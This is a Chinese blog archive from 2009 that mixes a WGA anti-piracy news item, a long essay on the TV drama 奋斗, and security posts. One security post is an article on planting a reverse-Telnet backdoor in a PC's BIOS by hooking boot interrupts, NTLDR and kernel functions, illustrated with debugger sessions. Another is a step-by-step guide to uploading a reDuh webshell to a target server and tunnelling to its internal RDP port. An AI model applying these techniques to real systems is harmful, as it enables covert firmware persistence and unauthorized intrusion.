微软再次开始反盗版,微软最近将通过对Windows Genuine Advantage Notifications的更新来揪出盗版的Windows XP专业版。

  据Windows Genuine Advantage产品部门经理Alex Kochis透露,此次针对盗版的更新程序可以识别出最新的假冒和遭窃、泄露的产品Key,而且还能识别出绕过激活过程的破解方式,一旦发现是盗版系统,用户电脑将像以前一样被设为“黑屏”。

  如果用户电脑的系统更新是默认打开,那么这次的WGA更新将自动向Windows XP系统发送,安装程序将允许用户在下次重启时安装该更新。对于已经安装上个版本WGA更新的系统,此次将自动在后台更新,无需用户干涉整个安装过程。

三月 30th, 2009

Posted In: 未分类

前两周一直对BIOS下面建telnet后门,一帮朋友研究了一下,看到网上吵的火热,也就发一个
【51CTO.com 独家特稿】该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。

项目涉及的相关知识及技术目录

1、 实验环境,使用bochs调试工具。

2、 刷新BIOS技术问题。

3、 代码植入BIOS问题。

4、 源代码相关技术问题:

A、如何编写BIOS模块(如:PCI、 ISA)。

B、实模式关于HOOK磁盘中断的问题。

C、磁盘中断中选择再次HOOK的问题。

D、NT保护模式下设置物理地址映射。

E、NT保护模式下线性地址寻址问题。

BIOS模块调试实验环境采用Bochs

Bochs虚拟机可以调试BIOS及操作系统,Bochs使用主要是配置它的配置文件,我们以实例配置文件简单讲解,Bochs实验调试等网上有很多相关文章,这里简单讲解。

我的配置实例:文件名xp.bxrc,修改后的及需要设置的内容如下:
[code] ######使用的系统BIOS模块######
romimage: file=$BXSHARE/BIOS-bochs-latest
######使用的CPU 相关参数######
cpu: count=1, ips=10000000, reset_on_triple_fault=1
######设置内存大小 ######
megs: 128
######添加我们的BIOS模块######
optromimage1: file=test.bin, address=0xd0000
######使用的VGAROM模块######
vgaromimage: file=$BXSHARE/VGABIOS-lgpl-latest
######设置虚拟机硬盘与光盘######
ata0-master: type=disk, path="c.img", mode=flat, cylinders=4161, heads=16, spt=63
#ata0-slave: type=cdrom, path="xp.iso", status=inserted
######设置引导设备 ######
boot: c
#boot: cdrom, disk[/code]
Bochs调试加载配置文件方法:可以设置一个bat文件,如下内容:
set BXSHARE=d:bochs
%BXSHARE%bochsdbg.exe -q -f xp.bxrc

如何刷新各种BIOS问题

各种BIOS刷新相关工具早已在网上流传,工具的使用这里不作介绍,IcLord的作者已经给出很多编程方法实现。这里简单说下。

UniFlash开源项目我也详细分析过,如果有必要我会给出UniFlash源代码的详解,该项目指出可以刷写所有BIOS芯片,但是该项目刷新BIOS存在很多问题,绝大多数情况是无法刷新的我实验过很多次,也尝试修改他的代码过很多次,没找到原因。

Aword BIOS已经有通用的刷写API调用,不管在NT下还是在实模式下,IcLord也作了讲解。如果有时间我会给出实模式及NT下的刷写源代码及分析。

代码植入BIOS问题

关于网上提及的,IcLord讲到的我就不再做重复的分析。这里主要讲下我们的模块可以植入哪些地方以方便隐藏。以前的教程讲过的方法存的问题分析。
一、 ISA模块形式植入:这种方式只适合于较早的计算机,因为目前的计算机系统BIOS是不会加载ISA模块的。故只能做实验调试用的方法。
二、 PCI模块形式植入:该方法虽然系统BIOS都要加载PCI ROM,但是系统BIOS只加载实际存在的PCI卡的ROM模块。而且通常BIOS设置中可以
关闭相应的ROM启动。
三、 HOOK BootBlock或者说要启动的模块:该方法当然我认为是最有效的,但是又存在很多技术上的难题。检验和问题,不同BIOS的结构问题,过早的HOOK还存在再次获取CPU运行机会问题等等。

本人实验过以上提及的所有方法,我认为HOOK PCI、VGA及相关启动模块是比较可寻的办法。为什么?一般这类的ROM模块是必须启动的,而且调试发现一般它的ROM本身代码用不完自身设置的大小,我们可以借助剩余大小隐藏我们的代码。例如:集成显卡会把显卡ROM集成到系统BIOS模块中,我们可以对该模块进行HOOK,修改ROM头部的跳转指令,跳到我们的代码开始处执行,我们的代码执行完后跳转到它的代码开始处执行。

如何编写BIOS模块

BIOS是分模块组合在一起的。这里对PCI及ISA模块作下简单分析,VGA模块跟PCI模块几乎一样。模块主要是头部有个规范,该规范适合所有BIOS系统。具体可以参看《PCI系统结构》及其他书籍。

源代码实例可以参看国外ROMOS开源项目,该开源项目的思想很值得学习。该项目讲解了如何在BIOS中嵌入一个小型DOS,如:FreeDos。采用了把整个DOS系统盘镜像植入BIOS中,跟早期的PXE引导DOS机制类似,然后HOOK磁盘中断,模拟DOS系统盘镜像出一个盘,源代码编译后只有900多字节。这种思想在早期还是很值得学习的。
实模式关于HOOK磁盘中断问题

很早前就有业界内人士发贴问,为什么在我的ROM模块中HOOK磁盘中断会失败呢?关于这个问题现在目前网上已经有人作出过回答,国外的开源项目在2003年我都看到过。

由于我们的ROM模块过早的运行,可能运行在磁盘服务前面了,这时如果HOOK Int 13h会因为BIOS加载磁盘服务时重写Int 13h IVT值,故我们设法HOOK其他服务,这个服务要求较早被BIOS安装且不会再次修改且加载操作系统前调用,最佳的这个服务选择就是int 18h、int19h服务。可以参看
BIOS源代码,也可以参看PXE SDK说明文档略有讲过。

我们的磁盘服务代码建议放在实模式高端内存,通过BIOS数据区域可修改,内存40:13,即物理地址413h处的值。降低常规内存值,高端的内存就留给我们用。我们的保护模式下运行的代码建议也放在这段内存,且要求放在以页基址开始的内存中,以便后面代码的页映射我们的保护模式代码物理页。页基址:内存物理页地地址开始的低12位为零,参看《80386保护模式教程》。

若我们的代码直接在内存的ROM映射区内,可能导致在NT下访问不到我们的代码,因为NT内核加载程序ntldr可能不会映射该段内存,甚至可能BIOS在使用后都会关闭ROM区域这段内存,而且ROM区域这段内存在初始化后被系统BIOS设置成只读不能写。当然我们可以采取用int 15h服务对ROM区域这段内存映射。

当然也可以在NT启动过程中,在我们的磁盘服务中对想映射的内存都映射。由于代码大小的限制,故有些没必要的代码。尽量不使用了。

磁盘中断服务中再次HOOK问题

为了使我们的程序再次获得CPU运行机会,我们不得不得再次设法。调试发现NTLDR进入保护模式后在加载NT内核文件时,会切换CPU到实模式调用Int 13H服务进行磁盘读。

我们挂接磁盘服务就是为了截取NTLDR的读操作,这里我们可以HOOK 或者修改NTLDR另一部分OsLoader的代码,跳转到我们的代码执行。当然也可以直接HOOK ntosknrl导出的服务,参看我在2008.4.1发布的“程序从DOS/BIOS驻留内存到WINNT下监视内存数据”。

注意,HOOK OsLoader的代码时选择HOOK指令问题,由于NTLDR切换到实模式读取数据,读完后会在保护模式下搬移数据到规划位置,进行内核的安装。故HOOK时选择HOOK指令就选择FFh/15h:使用CALL NEAR [OFS32]指令进行,该指令寻址采用绝对地址,类似指令也可以。

当然我们的代码再次运行就会运行在OsLoader代码被我们HOOK处,调用我我们的代码执行,这时我们的代码运行环境:DS = ES = 10h保护模式段,内存模式: FLAT。在这里我们可以通过扫描_BlLoaderData数据结构,获取NTOSKRNL镜像基址。

可以通过PE搜索NTOSKRNL导出的API,可以参看网上相关教程。现在再次HOOK NTOSKRNL导出函数KeAddSystemServiceTable,HOOK该函数
可以截获win32k.sys添加它自己的服务,以便我们再再次HOOk win32.sys导出函数NtUserRegisterClassExWOW。HOOK该函数可以截取所有应用层程序注册窗口类,以便我们再再再次HOOK窗口类过程。这时我们的代码就运行在NT的应用层模式下。
NT保护模式下设置物理地址映射

先看一个WinDbg实例关于在我们的磁盘服务中获取CR3值修改页映射的分析,以前我的分析内容:

[code]
NT内核被加载高端的2GB内存(80000000h~0ffffffffh)。参看NT内存安排..

a、win2k adv ser: WINDBG 看到 NT Kernel base = 0x80400000 也就是NTOSKRNL.exe加载位置

kd> r @cr3 ;断点位置在NTOSKRNL.exe里现在还没有应用程序故低端内存还未使用

cr3=00030000 ;->页目录表所在物理页(物理地址30000h)

kd> d 80030000 80030800 ;看页目录发现现在低端2GB(0~80000000h)还未分配

80030000 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….

80030010 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….

80030020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….

kd> d 80030800 ;看高端开始分配情况页表(80000000h开始的分配情况)

80030800 63 21 03 00 63 41 03 00-63 51 03 00 63 31 03 00 c!..cA..cQ..c1..

80030810 63 11 7c 00 63 21 7c 00-63 31 7c 00 63 41 7c 00 c.|.c!|.c1|.cA|.

80030820 63 51 7c 00 63 61 7c 00-63 71 7c 00 63 81 7c 00 cQ|.ca|.cq|.c.|.

;实例1:看80400000h(NT Kernel base),这个线性地址到物理地址映射情况.

;线性地址最高10位页目录项(每项占4Byte):80400000h最高10位=201h.

;在页目表位置:201h*4=804h 在内存地址=[cr3]+804h..具体看保护模式教程

kd> d 80030000+804 ;看在页目录表位置的值

80030804 63 41 03 00 63 51 03 00-63 31 03 00 63 11 7c 00 cA..cQ..c1..c.|.

;二级页表所在物理页地址:63 41 03 00转换下34163h,物理页地址:34000h,163h是页属性.

kd> d 80034000 ;看在页表的值

80034000 63 01 40 00 63 11 40 00-63 21 40 00 63 31 40 00 c.@.c.@.c!@.c1@.

;物理地址基址:63 01 40 00转换下400163h,#物理地址基址#:400000h,163h是页属性

;最后发现物理地址基址(页地址)在400000h..观察物理地址400000h是NTOSKRNL.exe映像.

kd> d 80400000 ;观察物理地址400000h

80400000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ…………..

80400010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ……..@…….

;实例2:看我们代码映射情况我们代码在物理地址:9e000h从线性地址8009e000h分析映射情况

;8009e000h在页目录位置最高10位=200h*4,在内存地址=[CR3]+200h*4…

kd> d 80030000+200*4

80030800 63 21 03 00 63 41 03 00-63 51 03 00 63 31 03 00 c!..cA..cQ..c1..

;二级页表对应物理地址:63 21 03 00转换下物理页基址=32000h ,163是页属性

;8009e000h所在二级页表位置:32000h+9eh*4(8009e000h线性地址12~22的位)…

kd> d 80032000 + 9e *4

80032278 23 e1 09 00 03 f1 09 00-03 01 0a 00 03 11 0a 00 #……………

;物理地址基址(页基址):23 e1 09 00转换下09e000h,123是页属性..

;#实例3:Windows运行起后用的页目录表线性地址:0c0000000h映射到物理地址情况.

kd> d 80030000 + c00 ;计算略.页目录表位置,观察发现指向自己的…

80030c00 67 00 03 00 63 00 f0 17-00 00 00 00 63 31 a9 02 g…c…….c1..

b、winXP: WINDBG 看到 Kernel base = 0x804d8000 PsLoadedModuleList = 0x8055b420

kd> r @cr3 ;断点位置在NTOSKRNL.exe里现在还没有应用程序故低端内存还未使用

cr3=00039000 ;->页目录表所在物理页(页目录物理地址30000h)

kd> d 80039000 80039800 ;看页目录发现现在低端2GB(0~80000000h)还未分配

80039000 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….

kd> d 80039800 ;看高端开始分配情况页表(80000000h开始的分配情况)

80039800 e9 b9 00 f6 06 a1 08 10-75 1b f6 06 a3 08 10 75 ……..u……u

;实例1:看我们代码映射情况我们代码在物理地址:9e000h从线性地址8009e000h分析映射情况

;8009e000h在页目录位置最高10位=200h*4,在内存地址=[CR3]+200h*4…

kd> d 80039000+200*4

80039800 63 b1 03 00 e3 01 40 00-63 e1 03 00 e3 01 00 01 c…..@.c…….

;二级页表对应物理地址:63 b1 03 00转换下物理页基址=3b000h ,163是页属性

;8009e000h所在二级页表位置:3b000h+9eh*4(8009e000h线性地址12~22的位)…

kd> d 8003b000 + 9e *4

8003b278 03 e1 09 00 03 f1 09 00-03 01 0a 00 03 11 0a 00 …………….

;物理地址基址(页基址):03 e1 09 00转换下09e000h,103是页属性..

———> ;*#实例2:手工修改分页让物理地址映射到线性地址,WINXP.80000000h BIOS/DOS向量区没映射.#*

kd> d 80000000 ;可看到现在没映射的情况,无法通过线性地址访问.

80000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????

80000010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????

;80000000h的最高10位确定在页目录表位置=200h*4=800h.在页目录物理地址:[cr3]+800h

kd> d 80039000+200*4;可发现二级页表已映射(63b10300)页属性163.物理地址(页)3b000h

80039800 63 b1 03 00 e3 01 40 00-63 e1 03 00 e3 01 00 01 c…..@.c…….

;80000000h的12~22位次高10位确定在二级页表位置:物理地址3b000h+0*4

kd> d 8003b000;观察发现确实没映射.全0.注意:一个页项占4字节…

8003b000 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….

;修改成让它对应物理地址:000就可以,只修改允许访问就可以.也就是byte ptr [8003b000]=63

kd> e 8003b000 63

kd> d 8003b000 ;修改成功

8003b000 63 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 c……………

;观察修改后的情况.;注意:要想设置生效.让WINDBG执行下G.让0C0000000等cr3被改等..

kd> g ;让系统自动刷新TLB等寄存器….

kd> d 80000000

80000000 53 ff 00 f0 53 ff 00 f0-c3 e2 00 f0 53 ff 00 f0 S…S…….S…

;#实例3:Windows运行起后用的页目录表线性地址:0c0000000h映射到物理地址情况.

kd> d 80039000 + c00 ;计算略.页目录表位置,观察发现指向自己的…

80039c00 67 90 03 00 63 00 f0 0f-00 00 00 00 63 31 e2 01 g…c…….c1..

c、分析以上总结:发现最开始获取的cr3值一直在用。

故我们修改页项的效果会在windows运行后也生效通过以上的实例分析可以看出NT系统的页映射情况。

进入保护模式之后这个CR3的值也就是页目录表位置被映射到了虚拟地址0c0000000h。

上面调试的实例页目录表地址就可以直接使用这个虚地址。
[/code]
例如:在我们的代码中把我们的代码拷贝到SharedUserData空间未使用处去,就使用了页映射代码,直接修改第一个页指向的物理页,就是我们代码所在的物理页。

NT保护模式下线性地址寻址问题

关于我们的代码进入保护模式以后,所有指令的寻址问题,这里作一下分析。当我们代码第一个在保护模式下执行的指令,是前面提到的磁盘服务中对OsLoader的代码进入HOOK,也提到了采用什么样的HOOK指令以便寻址。

接哪之后,我们的代码就开始运行在保护模式未分页情况下,我们采取的方法是把我们的代码拷贝到SharedUserData空间未使用处,涉及到拷贝的指令也必须运行在保护模式分页下,因为SharedUserData空间是一个虚地址。

在这里我们采用了把我们的拷贝代码指令搬移到NTOSKRNL镜像的MZ与PE之间的区域,设置HOOK NTOSKRNL导出函数KeAddSystemServiceTable首先跳转到拷贝指令执行,HOOK NTOSKRNL导出函数KeAddSystemServiceTable采用相对跳转指令它们在同一个空间。

当我们的拷贝指令把我们的代码拷贝到SharedUserData空间未使用处之后,我们的代码就有一个固定的虚地址,所有后续指令都可以采用这个虚地址进行寻址。

【51CTO.COM 独家特稿,转载请注明出处及作者!】

三月 30th, 2009

Posted In: 未分类

为什么陆涛不爱米莱……很经典 很深刻
这个文章虽然长了点还是比较深刻。因为经典怕以后在分享里翻老久都翻不到,所以转来了。

爸爸曾经对我说过
没有任何一个男人可以让你依赖一辈子。

妈妈曾经对我说过
如果一个男人在他什么都有的情况下喜欢你,才是真的喜欢你,变数不大,如果他一开
始一无所有,后来有了很多,那一般会抛弃你。

妈妈还说
以后不要找比我家差的,不行,如果家里比我们好太多,绝对不行。

胖阿姨说
男人要顾家,如果不顾家,再好再风光,也是别人的老公,不是你的。

还有别人对我说的那句话,女人失去自己的那一天,就是男人离开你的那一天。

有些东西是骨子里的,留着自己慢慢体会了。

《天生购物狂》里面何穷富有两个爸爸,一个穷爸爸一个富爸爸。

  一个花钱如流水,一个抠门到极致。

  在饭桌上,人人自我剖析自己的都市压力病,穷富的爸爸说,

  穷富像他两个爸爸,有爱花钱又很抠。
  

  陆涛骨子里是徐志森的不服输,功力,却从小耳濡目染陆亚迅的大隐于市。

  是,他曾蔑视陆亚迅,他曾对这个明知道不是自己的孩子也抚养二十多年,并且没
有自己的子嗣的男人没有丝毫的尊重。

  但是在故事的最后,他叫陆亚迅爸,并且他说他会一直这样叫。

  他,只叫徐志森老徐。   

  如果徐志森早出现一点,也许陆涛就不会爱上夏琳,骨子里陆涛在米莱面前是自卑
的,他不了解米莱,他觉得富家女就活该被他们坑骗,他也不爱米莱,因为他们不在一
个世界。   

  杨晓云和向南租房子的时候,说起俩人小时候都有过的四合院生活,说槐树和枣树
。可是陆涛和米莱,从来就不可能有共同的相似经历。   

  在陆涛越来越像徐涛的时候,夏琳开始茫然失措了,她发现这个男人对她说,买车
别忘了驾驶本写你的名字,她愤怒了,因为他变得和那些夜总会的男人再也没有什么不
同,她发现他慢慢地远离了他们的世界,不再是一起的时候相互抱怨工作不顺心,而是
他功成名就,而我只是个一无所成的业务员,他买了独栋别墅,我却还一无所有。

  这样的感觉,何曾不是陆涛有过的,米莱可以一下子花掉一个大学男生一个月的生
活费,可以开跑车上学,可以一下子玩一样的租下一套房子,这对于陆涛,太陌生。   

  米莱开A3,陆涛开A4,那个时候他们开始可以举案齐眉。

  然而,人的性格一般取决于基因,另一半是最初的记忆。

  心理老师告诉我,一岁看大,三岁看老。

  后来我终于明白,基因来自上一辈的阅历生活组合,最初的记忆便是他们奋斗来的
环境。   

  鸟类是有印随的,他出生的第一眼看到谁,就把谁当做妈妈。   

  陆涛越来越像徐涛,但是他始终还是陆涛。

  他不是生意人,他像陆亚迅多过徐志森,徐志森是商人,陆亚迅只是做自己的本职
工作,建筑。

  陆涛只是想做建筑,只是他更希望距离成功近一些。   

  最终陆涛还是陆涛,他选的不是灵仙儿,也不是米莱,因为他本质上不是有钱人,
他又一无所有了。

  他永远不是徐志森希望的徐涛,尽管曾经多相似。   

  奋斗讲的是许多人,看似一样,实际上他们不在同一平面上,好似华子和露露,华
子不了解露露,是因为他生下来就是北京人,不了解北漂的孤苦和没有安全感,但是猪
头懂。

  记得夏琳第一次到梦幻乌托邦的时候,露露的话说,现在海归也找不到工作。

  她羡慕夏琳,就好像夏琳也曾经卑微的羡慕过米莱。

  杨晓云也学夏琳独立,各自打掉孩子离开男人,她们对着灯火绚烂的北京发出两个
女人的呼喊,可是没有多久,他们都妥协于生活。

  杨晓芸没找到比向南更合适的,夏琳的倔强的妈妈开始劝她不要太执着,最后她妈
妈也还是和爸爸复婚,不做一个独身女人。

  又是一个两个女人卧谈的深夜,夏琳说,别忘了你就是因为什么都想要才落到今天
的下场的,杨晓云反诘道,不然我就更惨!

  镜头切换,夏琳在郊外和陆涛牵手缠绵,不再执意之前的倔强。   

  女人不能靠男人,却也不能完全孤立。

  男人不能靠别人,却也需要别人拉一把。   

  曾经有一组图片,讲的是许多人看似在同一平面,实际上那只是视觉而已,现实是
他们在不同的平面,有些对某些人轻而易举的事情另一些却觉得遥不可及。

  就好像看似大家都一样的奋斗中的各人,向南华子杨晓云最相近,米莱小灵仙儿都
是富家女,夏琳和陆涛都出身穷家小户,却一样壮志昂扬。露露和猪头都是北漂。

  对米莱来说轻而易举的事情,也许很多人一辈子都无法触及。

  

  门当户对四个字很老,却真的有道理。   

  有四个字对于婚姻来说最重要,那就是求同存异。

  爱你等于爱自己,因为我们很相似   

  被你和我迥然不同的生活所吸引,只是一时而已,人永远不可能爱别人超过自己。   

  比如遥遥和向南,终究是两个世界的人。

  故事的最初,陆涛的妈妈在茶室约陆涛见面。

  陆涛第一句话是什么?你怎么选了这么个地方啊,这地儿还不如麦当劳呢

  几十块钱的茶我都喝了,我还有什么不敢啊?   

  没有多久,他和徐志森接触久了,他有了两千万的时候,买东西付钱不眨眼不要找
零。

  他已经变了。

  徐志森分析陆涛身边的女人的时候,他说灵珊和米莱都很好,夏琳却让你无法刹车

  这就是徐式看法,和陆涛有本质的不同。

  因为陆涛不是富人出身,他不了解那些遥远的富家女生活和内心。

  他了解夏琳,因为他们生长环境很相似   

  人之初性本善,性相近习相远。

  因为陆涛生在陆家,所以他爱的是相似的夏琳。   

  陆涛爱的是夏琳而不是米莱,因为他不是徐涛。

  就算他曾经向徐志森靠拢,就算他曾经和夏琳分开。

  最后他叫陆亚迅爸,娶了夏琳。   

  向南的闪婚在于他以为娶了媳妇儿,一切就不同了,就会都由一个全新开始。

  就好像开学的小学生,准备好崭新文具,以为生活从此可以不同。

  就好像千禧年,只不过也是个寻常的日子,却被太多人赋予太多的期许。

  向南总觉得结婚之后一切就都会好了,好似所有的材料都准备好,做出来的饭就一
定好吃。

  实际上他却不努力,真正在为整个家努力的是杨晓芸不是向南。

  整个片子最喜欢杨晓芸的妈妈,苏小明扮演,她表面市侩,第一次看我不喜欢她,
然而她很务实,她赚了钱都是为这个家,晓云的奶奶只是她婆婆,她却计划为她买一个
助听器。

  因为她的市侩,她用旧房换了一套128平米的新房子

  而夏琳倔强的妈妈又为夏琳争取到了什么呢?最后她一样劝夏琳女人不能太倔强,
还是要找个依靠,而她自己还是选择与那个曾经蔑视的男人复婚了。   

  孙燕姿有首歌叫做同类,也许异类可以有瞬间的相互吸引,但能够相守的还是同类

  爱你等于爱自己,性相近,习相远。   

  心理学老师说,青梅竹马的感情离婚率与一见钟情一样高达1/5,媒妁之言最靠谱。

  有个福建的同学父母结婚当晚是第一次见面,却也过来了二十年,育有四个子女。

  她的幸福溢于言表。   

  记得猪头和露露谁都不明白乌托邦的含义,这就是他们的共通之处。

  心碎乌托邦里,向南华子灵珊陆涛米莱都住在等分的空间里,拥有一样大的空间,
这确实是乌托邦。这样的乌托邦终有一天在大家生活都归入正轨之后解散了,华子买了
160的大房子,向南和杨晓芸仍然在青年家园,陆涛去了法国。

  太平天国的口号是什么来着?人人有衣穿,人人有均田,但是最后太平天国只是一
种幻灭的理想主义。   

  我们曾经都像是乌托邦里平等的个体,在不同的环境和基因作用下有了不同的人生

  同人不同命,有人开奥拓,有人开奥迪,有人住house,有人无家可归。

  这就是人进步的动力   

  同是天涯沦落人,相识何必曾相逢。

  高山流水遇知音

  曲高和寡

  古今中外莫不如是   

  我们都是这美丽世界的孤儿,在寻找自己的同类,找到之后才发现自己不是孤独的
,不是怪物,不是一个人在奋斗。

  这就是夏琳之余陆涛无法取代的意义。

  在他越来越徐涛的过程中,徐涛和陆涛始终在斗争,夏琳就是陆涛的本来状态。

  他看到夏琳就会安心,知道自己还是陆涛。

  当夏琳不在了,他为什么会茫然,因为他找不到自己了。

  陆涛和徐涛势均力敌,让他迷茫。   

  记得向南最后说什么?杨晓芸你老想跟夏琳学,其实你和夏琳不一样!

  是,她们不一样,就好像杨晓芸的妈妈和夏琳的妈妈不一样。

  夏琳的妈妈倔强独身没有钱,杨晓芸的妈妈很会赚钱。   

  而米莱她是富家女,记得徐志森的那些生意伙伴甚至是陆亚迅带着陆涛去找的老朱
说什么?

  我的儿子要是能有你儿子一半的出息就好了。

  大家都在培养同类,找寻同类,结婚是寻找同类,酝酿同类的过程。

  位高权重的人们的孩子是米莱的同类,可惜她都不喜欢。   

  每个人都像秦始皇想要多活几千年,做不到于是就想把自己的生命和精神延续。   

  这部片子,我最喜欢杨晓芸的妈妈,何翠凤,还有陆亚迅。

  还有灵珊,她还小,成人世界背后的总有残缺还没有向她展开。

  她就像是曾经受伤之前的米莱,爱一个人就用自己的方式对她好。

  她却不要求任何,对露露的弟弟好,自己回台湾,只留下一个美好的笑容。

  不然呢?她一个富家女可以和露露弟弟这样的农家小子在一起吗?

  说什么呢?我爸爸问我买奥迪还是奔驰,别墅买在北京还是上海,过几天有个珠宝
展你陪我去看吧。   

  陆亚迅是真正的无愧于心,他活着每一天都是靠自己,不忿自己的不得志。

  于是他是真正的强者,他不需要谁来延续自己的生命。

  他可以不要自己的孩子,对陆涛视如己出。   

  陆涛和夏琳爱的是自己,因为他们在对方的身上找到了自己的影子,所以夏琳曾经
甘愿卑微爱着陆涛,让他实现自己的梦想。

  陆涛成功了,她就觉得自己也成功了。

  只是后来成功的陆涛变得徐涛,不再夏琳。

  而陆涛所奋斗的是为自己也是为夏琳,因为他们本来就有相似的目标。  

  这部片子最大的loser是徐志森,他处心积虑的成功,却在最后悔恨万分,他终于知
道自己所亲手放弃的是他最想得到的,爱,包括爱情和亲情。

  他独自奋斗了几十年,很想为自己找回一个同类,把陆涛变成徐涛。

  只是他终究失败了。   

  人之初,性本善。性相近,习相远。苟不教,性乃迁。教之道,贵以专。 昔孟母,择
邻处,子不学,断机杼。 窦燕山,有义方,教五子,名俱扬。 养不教,父之过。教不严,师之
惰。   

  养不教,父之过。

  陆亚迅和徐志森终究还是陆亚迅赢了。   

  若是有续集,就拍拍陆涛们如何培养出新的00后,陆亚迅和徐志森以及何翠凤何尝
不是曾经的陆涛夏琳杨晓芸呢?   

  成长的故事总是相似的,无论古今中外。因为人类都一样。   

  华子的父母很知足常乐,知道他要钱租房什么都没说给他钱,所以华子也很知足常
乐。

  向南的妈妈知道向南闪婚的时候哭着说了什么呢?你这孩子,以后你在外面谁给你
做饭谁给你洗衣服?向南像他妈妈吧?一样的对杨晓芸说过类似的话。

  夏琳的妈妈倔强的离开她爸爸最后又复婚,夏琳走的也是一样的路。

  杨晓芸的妈妈务实却最明白一切,杨晓芸和华子差点出事之后对着镜子说,杨晓芸
你要是一失足成千古恨了,没有人会可怜你,你只会更可怜!

  她真像她妈妈,什么都明白,什么不能做,什么可以做,好似赚陆涛的钱是一回事
,但是把陆涛的找零坚持塞给他。

  米粒熊同志和徐志森相比多么不像个专业的生意人,他是厨师出身,呵呵,米莱随
他,斗不过徐志森这样的在商言商。

  米莱的爸爸可以把生意交付给米莱,为了她的一个爱情幻想损失几亿。

  露露其实没那么可恨,她其实最不贪心,她在祷告的时候说,我还爱着华子,但是
我明白我不能太贪心,我不能什么都要。

  她那农民爸爸的临终遗愿和米粒熊以及徐志森说的话竟然一摸一样。

  最重要的是,一家人永远在一起。   

  我就说虽然学历门第生长环境让人有很大的差异,但是人性使然,最本质的最重要
的还是一样。   

  一家人永远在一起是为什么呢?

  为了不孤独的奋斗,为了同类。   

  陆陆续续加了这么多话上去,最后总结我想说什么呢?

  奋斗让我知道最大的道理,人和人是不同的,别人一天花一万,你盲目跟风,却忽
略了人家一天赚十万而你一天赚一百。

  不要帮别人实现梦想,别人始终是别人,父子也好,夫妻也罢,朋友更如此。

  徐志森帮陆涛实现梦想,米莱也帮陆涛但是不是自己奋斗来的永远不知道珍惜。

  陆涛帮夏琳实现梦想,夏琳只觉得人格受到侮辱,真正爱一个人就要尊重她希望的
方式。

  金钱很重要,朋友更重要,但是自己最重要。

  不要为了金钱失去朋友,不要为了朋友爱人失去自我。

  有个富爸爸很沾光,嫁给有钱人很风光。

  可是你要懂得,与失去自我相比,这一切不足一提。

  而,没有人会因为别人而真正实现自我。  

  不要骂这片子,《国富论》说,即使一枚钉子也包含技术含量,何况一部作品。

  以陆涛为主线,铺陈开了老一代的价值观,以及华子向南露露杨晓芸米莱的不同生
活。

  也许你是华子,所以你不愤陆涛的生活。

  也许你是露露,所以你不理解米莱的随性。

  也许你是夏琳,所以你不理解露露的变心。   

  但是,身边总会有华子米莱露露杨晓芸向南,只是他们的生活你并不了解。

  也总会有陆涛和夏琳。

  你只了解你自己的,所以你也一样在寻找同类,期待共鸣。

  这就好像曾经陆涛不理解陆亚迅,也不屑过他。

  你骂着陆涛,和当时的陆涛又有什么分别?   

  成长的第一步就是接受这个世界的纷繁复杂,个体的多样性。并且在了解这个世界
的复杂之后,一样的坚持自我。

  找到一群志同道合的朋友,可以琴瑟合鸣的伴侣,都是为了坚持自我而努力。

  而成功也不过是为了更好的坚持自我。   

  人最大的敌人是自己,这是放之四海而皆准的道理。

  无论你是80后90后00后还是博士后太后。   

  这是一个五零六零后的故事续集,陆亚迅和徐志森,看似徐志森胜出,可是因为陆
涛的选择,就代表了这个新的时代的选择,他敬重陆亚迅,只是同情徐志森。

  陆亚迅是真正的强者本不需要任何人的认同和支持,但是最后他意外得到这个一直
不把他放在眼里的养子的一声“爸”那一刻,他很感动也很错愕,他这一生终于圆满。

  陆涛是双鱼座,陆亚迅是典型的金牛座,踏实肯干,勤勤恳恳一辈子。   

  这个世界有华子露露杨晓芸,有向南遥遥米莱,有夏琳和陆涛,有陆亚迅和徐志森

  你可以自由选择自己想成为的模式,也要尊重别人的选择。

  物竟天择,总有几种人会被淘汰,也总有人竞争胜利继续繁衍。   

  好似歌坛有王菲有陈奕迅,有梁咏琪有孙燕姿,有赵传有张惠妹。

  文坛有琼瑶也有张爱玲,有韩寒也有郭敬明,有余秋雨也有鲁迅。

  他们百家争鸣,丰富了所有人的视野。

  你可以选择你喜欢的去接受   

  每个人都坚持自我,并且尊重他人。相安无事,世界太平

三月 21st, 2009

Posted In: 未分类

今天对老弟上学有了些看法,现在上大学,别说清华,北大,真的教育质量就那么高吗,虽然我不是名校子弟,可是也不比他们差,前天晚上的315晚会,一个写个病毒变种的,也能叫黑客,做一个免杀,就能称为高手,杀毒软件是死的,人是活的吗,为什么一定要按别人的思想去写了,我刚过很多种病毒,代码反着写的,随机调用特征码的,这些都被免杀了,要知道,杀毒软件不是万能的,相信杀毒软件,但不能100%的去相信哪,哎~~~,什么是黑客,什么是骇客,这些或许永完定义不清,只有从事这个行业的人才知道,网络安全,你知道多少

三月 17th, 2009

Posted In: 未分类

作者:sai52[B.H.S.T]

国外大牛的作品,偶顺手写了个使用说明。E文好的看原文 http://www.sensepost.com/research/reDuh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机——-客户端———(http隧道)———–服务端——————内网服务器

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上JDK。

把客户端文件解包,这里我把它放到E盘的TEST文件夹

把服务端的webshell上传到目标服务器。

目标服务器在内网,开了终端服务。

命令行下用客户端连接服务端

E:test>java reDuhClient 目标服务器域名 http 80 /WEBSHELL路径/reDuh.aspx

新开一个命令行,用NC连接本机1010端口。
H:>nc -vv localhost 1010

连接成功会有欢迎提示,之后输入命令
>>[createTunnel]1234:127.0.0.1:3389

